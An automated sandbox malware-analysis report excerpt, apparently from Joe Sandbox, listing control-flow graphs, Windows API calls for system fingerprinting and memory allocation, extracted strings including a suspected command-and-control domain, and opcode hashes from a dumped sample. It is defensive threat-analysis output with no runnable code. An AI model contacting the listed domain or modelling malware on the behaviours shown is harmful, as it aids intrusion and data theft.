                                                                                                                                                                                                              control_flow_graph 582 408710-408721 call 43c600 585 408727-40872e call 434990 582->585 586 408a9d-408a9f ExitProcess 582->586 589 408734-408767 GetCurrentProcessId GetCurrentThreadId 585->589 590 408a86-408a8d 585->590 591 408771-408843 SHGetSpecialFolderPathW 589->591 592 408769-40876f 589->592 593 408a98 call 43cc50 590->593 594 408a8f-408a95 call 4080e0 590->594 595 408850-40887e 591->595 592->591 593->586 594->593 595->595 598 408880-4088af call 43b130 595->598 602 4088b0-4088cc 598->602 603 4088e6-4088fd GetForegroundWindow 602->603 604 4088ce-4088e4 602->604 605 408903-408a43 603->605 606 408a47-408a7a call 409ca0 603->606 604->602 605->606 606->590 609 408a7c call 40c8d0 606->609 611 408a81 call 40b6b0 609->611 611->590
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00408734
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0040873E
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408822
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 004088F5
                                                                                                                                                                                                                • Part of subcall function 0040B6B0: FreeLibrary.KERNEL32(00408A86), ref: 0040B6B6
                                                                                                                                                                                                                • Part of subcall function 0040B6B0: FreeLibrary.KERNEL32 ref: 0040B6D7
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00408A9F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                              • String ID: iGr
                                                                                                                                                                                                              • API String ID: 3676751680-3172554082
                                                                                                                                                                                                              • Opcode ID: b345672c4834dbb95b68c884c5a00b9a366ba58a5d09aa25e27f7d07c8f7e81c
                                                                                                                                                                                                              • Instruction ID: de36bf932efdb972923ea4c6355cfe05421ed9c09d9add80e63c4a458175fe6b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b345672c4834dbb95b68c884c5a00b9a366ba58a5d09aa25e27f7d07c8f7e81c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61916B73F447104BC308AE69CD8635AF6C79BC4604F1EC53EA998EB791EA7C8C054785

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              control_flow_graph 746 40d693-40d6b6 call 4097c0 CoUninitialize 749 40d6c0-40d6d2 746->749 749->749 750 40d6d4-40d6e5 749->750 751 40d6f0-40d722 750->751 751->751 752 40d724-40d766 751->752 753 40d770-40d799 752->753 753->753 754 40d79b-40d7a3 753->754 755 40d7a5-40d7af 754->755 756 40d7bb-40d7c3 754->756 757 40d7b0-40d7b9 755->757 758 40d7c5-40d7c6 756->758 759 40d7db-40d7e6 756->759 757->756 757->757 762 40d7d0-40d7d9 758->762 760 40d7e8-40d7e9 759->760 761 40d7fb-40d803 759->761 763 40d7f0-40d7f9 760->763 764 40d805-40d809 761->764 765 40d81d 761->765 762->759 762->762 763->761 763->763 766 40d810-40d819 764->766 767 40d820-40d82b 765->767 766->766 768 40d81b 766->768 769 40d83b-40d847 767->769 770 40d82d-40d82f 767->770 768->767 772 40d861-40d922 769->772 773 40d849-40d84b 769->773 771 40d830-40d839 770->771 771->769 771->771 774 40d930-40d962 772->774 775 40d850-40d85d 773->775 774->774 776 40d964-40d97f 774->776 775->775 777 40d85f 775->777 778 40d980-40d992 776->778 777->772 778->778 779 40d994-40d9a9 call 40b6e0 778->779 781 40d9ae-40d9c8 779->781
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: 45*$[<X2$sputnik-1985.com$zr
                                                                                                                                                                                                              • API String ID: 3861434553-549244510
                                                                                                                                                                                                              • Opcode ID: d9306b201c53d49242ecc6fb01d4bd3f81ffcaf4673812bcca7d4250df4ad3db
                                                                                                                                                                                                              • Instruction ID: 306f87100bc4aa896c738fc5f575ce4acc531b808f38179184bca6ff511edaca
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9306b201c53d49242ecc6fb01d4bd3f81ffcaf4673812bcca7d4250df4ad3db
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C9114B5504B829FD325CF7AC590612BFE2BF973007188699C0D61BB92C379B81ACBD5

                                                                                                                                                                                                              Control-flow Graph

control_flow_graph 786 40af30-40afc6 787 40afd0-40afd9 786->787 787->787 788 40afdb-40afee 787->788 790 40aff5-40aff7 788->790 791 40b267-40b26e 788->791 792 40b277 788->792 793 40affc-40b212 788->793 794 40b403-40b40a 790->794 791->792 797 40b280-40b2a2 792->797 795 40b220-40b249 793->795 795->795 796 40b24b-40b256 795->796 798 40b259-40b260 796->798 813 40b2f5 797->813 817 40b3e0 797->817 818 40b301 797->818 819 40b2a9-40b2ad 797->819 820 40b3ba-40b3d1 call 43e770 797->820 798->791 798->792 798->797 800 40b340-40b34f 798->800 801 40b542-40b54d 798->801 802 40b505-40b524 798->802 803 40b4a7-40b4b5 798->803 804 40b309-40b315 798->804 805 40b2e9-40b2ee 798->805 806 40b3aa-40b3b3 798->806 807 40b40b-40b412 798->807 808 40b42b-40b454 798->808 809 40b52b-40b53b 798->809 810 40b2ce-40b2d3 call 43cc70 798->810 811 40b5d0-40b665 call 407fb0 798->811 812 40b552-40b5c7 call 407fb0 798->812 798->813 814 40b379-40b383 798->814 815 40b419-40b424 798->815 816 40b2fb 798->816 836 40b350-40b36e 800->836 802->797 802->801 802->805 802->806 802->809 802->810 802->813 823 40b4e0-40b4fd call 43e770 803->823 824 40b6a1-40b6aa 803->824 825 40b3a1-40b3a5 803->825 826 40b681-40b683 803->826 827 40b4c2-40b4df call 43e770 803->827 828 40b38a-40b39f call 43e770 803->828 830 40b3f0-40b3f6 803->830 832 40b4bc 803->832 833 40b3fe-40b400 803->833 835 40b320-40b33e 804->835 805->813 805->817 805->818 805->819 805->820 805->823 805->824 805->825 805->826 805->827 805->828 829 40b68b 805->829 805->830 831 40b693 805->831 805->832 805->833 806->817 806->818 806->820 806->823 806->824 806->825 806->826 806->827 806->828 806->829 806->830 806->831 806->832 806->833 807->797 807->800 807->801 807->802 807->803 807->804 807->805 807->806 807->808 807->809 807->810 807->813 807->814 807->815 807->816 834 40b460-40b47f 808->834 809->797 809->801 809->805 809->806 809->810 809->813 841 40b2d8-40b2e2 810->841 848 40b66b-40b678 811->848 812->811 814->825 814->826 814->828 814->830 814->833 815->797 815->800 815->801 815->802 815->803 815->804 815->805 815->806 815->808 815->809 815->810 815->813 815->816 817->830 818->804 840 40b2b5-40b2c7 819->840 820->817 823->802 824->848 825->848 826->829 827->823 828->825 829->831 830->833 853 40b69b 831->853 833->794 834->834 843 40b481-40b4a0 834->843 835->800 835->835 836->836 845 40b370 836->845 840->797 840->805 840->810 840->813 841->797 841->805 843->797 843->801 843->802 843->803 843->805 843->806 843->809 843->810 843->813 845->814 848->826 853->824
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: CI$D|$P-Hp0xHp$57
                                                                                                                                                                                                              • API String ID: 0-596176976
                                                                                                                                                                                                              • Opcode ID: 24b4c8e607211bd7989446cd1802cc6cb5e641a0b2f8f70cacb991d755ce5a12
                                                                                                                                                                                                              • Instruction ID: 5efbdb5857c2b19ead38b752fe917dd5e517de98fc6789af245636b68d972842
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 24b4c8e607211bd7989446cd1802cc6cb5e641a0b2f8f70cacb991d755ce5a12
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4512ADB6600B01DFD3248F25D891757BBF2FB86314F158A2DD5AA8B7A0DB74A805CF84
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: jW}U$jW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-3254358678
                                                                                                                                                                                                              • Opcode ID: f0c88c59089368c22277e3f630874fb5ecbc8d13c4c59e7274c07c995bc35c9a
                                                                                                                                                                                                              • Instruction ID: 1bc7465fbc2acd12f1db27058802fb2540a04be9c422988ecf1b99415a044ea2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0c88c59089368c22277e3f630874fb5ecbc8d13c4c59e7274c07c995bc35c9a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DC16A7360C7518FC3249A7C888125BFBD26BDA334F2E5B2ED4E4973D1D6788801878A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                              • API String ID: 0-4108050209
                                                                                                                                                                                                              • Opcode ID: 900ec00274fd2904e8a9ee1d06cf83dbd6b482a52b60e155d335a3ff565db05c
                                                                                                                                                                                                              • Instruction ID: d3ba87c4c0d25c63924969f520cf7600d13d9f730c10bad0605ab6a274689941
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 900ec00274fd2904e8a9ee1d06cf83dbd6b482a52b60e155d335a3ff565db05c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D981F7B15083419FC714DF28C8617ABB7E1AF95314F148A2DE4D987391E738DD85CB86
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008DB1DE
• Module32First.KERNEL32(00000000,00000224), ref: 008DB1FE
Memory Dump Source
• Source File: 00000000.00000002.1532069127.00000000008DA000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DA000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8da000_filename.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID:
• String ID: C144BB41BBB5F67BBC510B35BBB55F9A$U
• API String ID: 0-2395377406
APIs
• LdrInitializeThunk.NTDLL(0043FCC8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043CD0E
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InitializeThunk
• String ID: @
• API String ID: 2994545307-2766056989
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 605e46f755210dcc9c0da62b95d27905939b104732a3df235dd1714a1aaf91ba
                                                                                                                                                                                                              • Instruction ID: c3089623b9e3368e7f8b682d30200594994b946a3c95ad14b04103bf8fb04565
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 605e46f755210dcc9c0da62b95d27905939b104732a3df235dd1714a1aaf91ba
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 04517D77B106009FD715AF3ADCC273B72A3ABD5318F18083DE456A73D2DA3CA8058659
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: d9f47a00cdc02831e61954dd521e1391d4054793574a3e978fbebeb9b66cf0c9
                                                                                                                                                                                                              • Instruction ID: cae4caa0a8c1025677c653afa2e18e3a8ee8d16afbcf87a5670b38fa9449bd37
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9f47a00cdc02831e61954dd521e1391d4054793574a3e978fbebeb9b66cf0c9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F5194366106019FE319CF2AC881722F7E3EFD9324F29866ED4565B3E5D774A8128B44
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 7a5983e881f33d68e73c81bc0c50338dd42d7247078efa5b69dca4e19aaaa378
                                                                                                                                                                                                              • Instruction ID: 421292d289628c2ec28063948a5b776e44441af3a063dbb0a1d93cd7e2ec04a2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7a5983e881f33d68e73c81bc0c50338dd42d7247078efa5b69dca4e19aaaa378
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E310B746483958BD7198B25A8A073BBFD1DF93355F78086DE0C3473A1D3249C45CB99
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 931e72134b3522e0373eced100f9446d56ca1b7712d33c327de1975d299fd239
                                                                                                                                                                                                              • Instruction ID: e5e35f6c30f5e2a170d1ccdb0b81da1aa2fbc574e4b98070eda34d0d44b77c4a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 931e72134b3522e0373eced100f9446d56ca1b7712d33c327de1975d299fd239
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1210772B053504BE318CF39CC8569B7BD6ABD6318F09873CD4A55B2C6D734990AC685
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0dd6712335a4cca2d09baf438142087798eabd4d492edb18bd98594e903b922f
                                                                                                                                                                                                              • Instruction ID: 9e205eb619e0fdcba4f4a0d91f631a1642ebdafc9a1436f62b37a1c298d6d2b2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0dd6712335a4cca2d09baf438142087798eabd4d492edb18bd98594e903b922f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 261127B1A00622D7C720CF28D861237B7F1FF93360B58A615C4956B786F7389991CB8D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7116429d202a4228fde13b208bc1c124ce83d96c2f75f28deb0ed3e3fe334961
                                                                                                                                                                                                              • Instruction ID: 99ee83c2afa72f0d0c781c27911b0bc59b0e00a7417cb352cc8b3c4f04647dcb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7116429d202a4228fde13b208bc1c124ce83d96c2f75f28deb0ed3e3fe334961
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F51106A1A00722D3C7218F28D861237B7B2FF93350B98A519C4D56B746F7389991CB8C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 5e340f29cd1df72159c6b88eb651a7251a085d5565b0d01b4bc6e0ea9c07ef73
                                                                                                                                                                                                              • Instruction ID: 52df2764e7ded2afadc6ad1e2d293c3ab20e01d64d9fb601fdcf9eee6b244354
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5e340f29cd1df72159c6b88eb651a7251a085d5565b0d01b4bc6e0ea9c07ef73
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F401D679A04150EBDB198F18E8A153B73A6DB5B308F24242ED683A7351DB249C118B5C

Control-flow Graph (graph image not reproduced; node legend: Executed / Not Executed)
• Graph data for the function starting at 0247003C: its basic blocks call VirtualAlloc, VirtualProtect, VirtualFree and LoadLibraryA
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0247024D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_filename.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: D7526975A01229DFDB64CF68C984BADBBB1BF09304F1480DAE55DAB351DB30AA85CF14

Control-flow Graph

APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B78F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: CU$RFQy$l;`U$z;`U
• API String ID: 3960555810-461700112
• Opcode ID: 9a61ed3707dcb819620eb9b72200b665080708ecc9ccf67336aec33957438daa
• Instruction ID: 4450fe3a4cd9cba408e9f5f34038f77dfd34b108d8a35ae970a4cd3e0dd6698b
• Opcode Fuzzy Hash: 9a61ed3707dcb819620eb9b72200b665080708ecc9ccf67336aec33957438daa
• Instruction Fuzzy Hash: 4BA1C174A0C3918AD715CF2A945036BFFE1AFE3305F68499EE0D587392D7398806CB96

Control-flow Graph

APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B78F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: CU$RFQy$l;`U$z;`U
• API String ID: 3960555810-461700112
• Opcode ID: 10777dd44f7ac0a99ac2b221d05814f59396b05ce36df08a1bcedde27e36f601
• Instruction ID: 4f5193a7f60610b5f5ffb64e57883cb1cbf6e14fcbf33ef3274a3339077fd52c
• Opcode Fuzzy Hash: 10777dd44f7ac0a99ac2b221d05814f59396b05ce36df08a1bcedde27e36f601
• Instruction Fuzzy Hash: B491C070A0C3918BD715CF2A945036BFFE1AFD2304F58495EE0D587392D73A8806CB96

Control-flow Graph

APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042B78F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: InstalledMemoryPhysicallySystem
• String ID: CU$RFQy$l;`U$z;`U
• API String ID: 3960555810-461700112
• Opcode ID: 1f7a32c1a7e6a88faf6a08310750b0ca35e67a74b50c495e2dc7cbd3f92ca4b5
• Instruction ID: 96ee4e31bc9202afdda2afef1036a51624070109c990ef8ca0c29cac23392fb9
• Opcode Fuzzy Hash: 1f7a32c1a7e6a88faf6a08310750b0ca35e67a74b50c495e2dc7cbd3f92ca4b5
• Instruction Fuzzy Hash: 9481AF70A0C3918AE715CF2A945076BFFE1AFE3305F58495EE0D587392D73A8806CB96

Control-flow Graph

APIs
• GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042AD3D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: ComputerName
• String ID: c@$iu2
• API String ID: 3545744682-3477820827
• Opcode ID: 75a89827526749a1a1a007a98808a7d51fd3c4ac85d34ec0e96ecc2f3812b44c
• Instruction ID: 3d839d535991c1d85afefe73884e3ba141c50531c9c363a2a6daa55da7d6be0f
• Opcode Fuzzy Hash: 75a89827526749a1a1a007a98808a7d51fd3c4ac85d34ec0e96ecc2f3812b44c
• Instruction Fuzzy Hash: 5A2106303497D28BEB298E3584543EBBBD66BC6305F1C466D84CA8B385CB7840068752
APIs
• GetComputerNameExA.KERNELBASE(00000005,?,00000100), ref: 0042AD3D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_filename.jbxd
Similarity
• API ID: ComputerName
• String ID: c@$iu2
• API String ID: 3545744682-3477820827
• Opcode ID: 52f5a0ea6259d1a0f0fdc7417bb953db3f84d14775f594d19535e91b30c850e9
• Instruction ID: bbd77dbc4ac7b9694708bb8d7f105731e2554e1f2ed9402ed29219d019095eb0
• Opcode Fuzzy Hash: 52f5a0ea6259d1a0f0fdc7417bb953db3f84d14775f594d19535e91b30c850e9
• Instruction Fuzzy Hash: C521263575979287EB288E35C8583EFBBD76BC6315F1D8A7D848A8B384CB7840068752
APIs
